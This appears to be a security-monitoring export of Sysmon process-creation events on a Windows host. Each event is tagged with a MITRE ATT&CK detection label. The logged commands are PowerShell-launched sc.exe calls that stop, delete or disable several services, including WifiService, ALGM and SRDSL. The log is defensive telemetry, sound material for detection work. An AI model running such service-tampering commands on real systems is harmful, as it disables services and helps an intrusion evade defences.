10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.394664500Z"",""eventRecordID"":""2150"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.392\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001005861900}\r\nProcessId: 3308\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.392"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001005861900}"",""processId"":""3308"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.821",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.342 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ac831900} +ProcessId: 3280 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.346070200Z"",""eventRecordID"":""2147"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.342\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ac831900}\r\nProcessId: 3280\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.342"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ac831900}"",""processId"":""3280"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.775",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.284 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7811900} +ProcessId: 4652 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.289901700Z"",""eventRecordID"":""2145"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.284\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c7811900}\r\nProcessId: 4652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.284"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c7811900}"",""processId"":""4652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.759",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:49:35.263 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f2801900} +ProcessId: 7064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.270314200Z"",""eventRecordID"":""2144"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.263\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f2801900}\r\nProcessId: 7064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.263"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010f2801900}"",""processId"":""7064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:03.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.215 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00105b7e1900} +ProcessId: 1052 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.220345000Z"",""eventRecordID"":""2141"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.215\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00105b7e1900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.215"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00105b7e1900}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.651",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.176 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f27b1900} +ProcessId: 4212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.178769800Z"",""eventRecordID"":""2138"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.176\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010f27b1900}\r\nProcessId: 4212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.176"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010f27b1900}"",""processId"":""4212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.635",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.164 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010297b1900} +ProcessId: 5560 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
